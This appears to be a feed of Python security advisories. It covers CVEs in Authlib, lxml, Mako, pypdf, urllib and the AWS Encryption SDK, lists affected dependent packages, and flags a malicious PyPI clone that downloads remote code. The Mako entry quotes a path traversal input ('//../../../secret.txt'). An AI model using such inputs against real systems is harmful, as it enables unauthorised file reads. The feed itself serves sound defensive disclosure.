CLSA-2026-1777393949 python: Fix of CVE-2019-9948

CVE-2019-9948: fix urllib localfile:// URL scheme bypass that allowed file reads when localfile handler was defined...

[SECURITY] Fedora 44 Update: python-cairosvg-2.9.0-1.fc44

CairoSVG is a SVG 1.1 to PNG, PDF, PS and SVG converter which can also be used as a Python library...

DEBIAN-CVE-2026-41425

Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to 1.6.11, there is no CSRF protection on the cache feature in authlib.integrations.starletteclient.OAuth. This vulnerability is fixed in 1.6.11...

CVE-2026-41425

Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to 1.6.11, there is no CSRF protection on the cache feature in authlib.integrations.starletteclient.OAuth. This vulnerability is fixed in 1.6.11...

UBUNTU-CVE-2026-41425

Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to 1.6.11, there is no CSRF protection on the cache feature in authlib.integrations.starletteclient.OAuth. This vulnerability is fixed in 1.6.11...

PYSEC-2026-87

lxml is a library for processing XML and HTML in the Python language. Prior to 6.1.0, using either of the two parsers in the default configuration with resolveentities=True allows untrusted XML input to read local files. Setting the resolveentities option explicitly to resolveentities='internal' ...

UBUNTU-CVE-2026-41205

Mako is a template library written in Python. Prior to 1.3.11, TemplateLookup.gettemplate is vulnerable to path traversal when a URI starts with // e.g., //../../../secret.txt. The root cause is an inconsistency between two slash-stripping implementations. Any file readable by the process can be...

UBUNTU-CVE-2026-41314

pypdf is a free and open-source pure-python PDF library. An attacker who uses a vulnerability present in versions prior to 6.10.2 can craft a PDF which leads to the RAM being exhausted. This requires accessing an image using /FlateDecode with large size values. This has been fixed in pypdf 6.10.2...

CVE-2026-41168

pypdf is a free and open-source pure-python PDF library. An attacker who uses a vulnerability present in versions prior to 6.10.1 can craft a PDF which leads to long runtimes. This requires cross-reference streams with wrong large /Size values or object streams with wrong large /N values. This ha...

CVE-2026-6550 Key commitment policy bypass via shared key cache in AWS Encryption SDK for Python

Cryptographic algorithm downgrade in the caching layer of Amazon AWS Encryption SDK for Python before version 3.3.1 and before version 4.0.5 might allow an authenticated local threat actor to bypass key commitment policy enforcement via a shared key cache, resulting in ciphertext that can be...

agentic-layer-testbench (>=0.9.1 <=0.9.2), agentic-rag-pdf (>=0.1.2 <=0.1.5) +55 more potentially affected by CVE-2025-45691 +1 more via ragas (>=0.2.6 <=0.4.3)

ragas PYPI version =0.2.6, =0.9.1, =0.1.2, =0.1.0a1, =1.0.8, =0.1.6, =11.1.12, =0.20.24, =0.1.1, =1.0.0, =1.1.0, =0.1.0, =0.1.0, =0.1.0b1, =2.0.0 and more Source cves: CVE-2025-45691, CVE-2026-6587 Source advisory: SNYK:PYTHON-RAGAS-16134617...

CVE-2026-40260

pypdf is a free and open-source pure-python PDF library. In versions prior to 6.10.0, manipulated XMP metadata entity declarations can exhaust RAM. An attacker who exploits this vulnerability can craft a PDF which leads to large memory usage. This requires parsing the XMP metadata. This issue has...

ROS-20260417-73-0014

Vulnerability in python-PyPDF2 related to unrestricted resource allocation. Exploitation of the vulnerability could allow an attacker acting remotely to cause a denial of service...

3m (>=0.1.0 <=0.1.3), a2d-diary (>=0.1.0 <=0.1.5) +1779 more potentially affected by CVE-2026-41313 via pypdf2 (>=1.24.0 <=3.0.1)

pypdf2 PYPI version =1.24.0, =0.1.0, =0.1.0, =1.1.0, =0.0.0.1, =0.0.1, =0.0.0.1, =0.0.0.1, =0.0.0.1, =0.0.0.1, =0.0.0.2, =0.0.0.1, =0.0.0.1, =0.0.0.1, =0.0.0.1, =0.0.0.1, =0.0.0.1038 and more Source cves: CVE-2026-41313 Source advisory: SNYK:PYTHON-PYPDF2-16097904...

adoc (>=0.1.0 <=0.1.5), adr (>=0.4.0 <=0.4.1) +231 more potentially affected by CVE-2026-41205 via mako (>=1.0.1 <=1.3.10)

mako PYPI version =1.0.1, =0.1.0, =0.4.0, =0.1.0, =1.0.4, =0.0.1, =0.7.0, =1.0.1, =0.1.2, =0.1.0, =0.3.24, =0.1.0, =0.1.1, =0.1.6 and more Source cves: CVE-2026-41205 Source advisory: SNYK:PYTHON-MAKO-16098253...

[SECURITY] Fedora 43 Update: python-cairosvg-2.9.0-1.fc43

CairoSVG is a SVG 1.1 to PNG, PDF, PS and SVG converter which can also be used as a Python library...

aws-credential-process (=0.20.0), aws-session-daemon (>=0.1.0 <=0.6.0) +2 more potentially affected by CVE-2026-40947 via yubikey-manager (>=5.0.0 <=5.1.1)

yubikey-manager PYPI version =5.0.0, =0.1.0, =1.0.0, =1.6.6 Source cves: CVE-2026-40947 Source advisory: SNYK:PYTHON-YUBIKEYMANAGER-16325204...

MAL-2026-2671 Malicious code in kryptex-os (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 034201cad27492b279f5c274a5091b2e617da50f27125c7774db069256b3486e Clones of legitimate libraries with malicious modifications intended to download malicious remote code. The remote script allows executing arbitrary files...

article-extractor (=0.5.8), nscraper (>=0.1.0 <=0.1.5) potentially affected by unknown CVE via justhtml (>=1.13.0 <=1.14.0)

justhtml PYPI version =1.13.0, =0.1.0, =0.1.5 Source cves: unknown CVE Source advisory: SNYK:PYTHON-JUSTHTML-16032358...

adversarial-attacks-white-black-box (=0.1.7), datagenkit (=0.1.1) +37 more potentially affected by CVE-2026-40086 via rembg (>=2.0.57 <=2.0.69)

rembg PYPI version =2.0.57, =0.0.3, =1.0.0, =1.9.2, =5.1.6, =2.12.0, =1.0.0, =0.1.0, =1.0.3, =0.0.7, =2.0.0, =1.0.0, =1.0.0, =1.0.4 and more Source cves: CVE-2026-40086 Source advisory: SNYK:PYTHON-REMBG-15969263...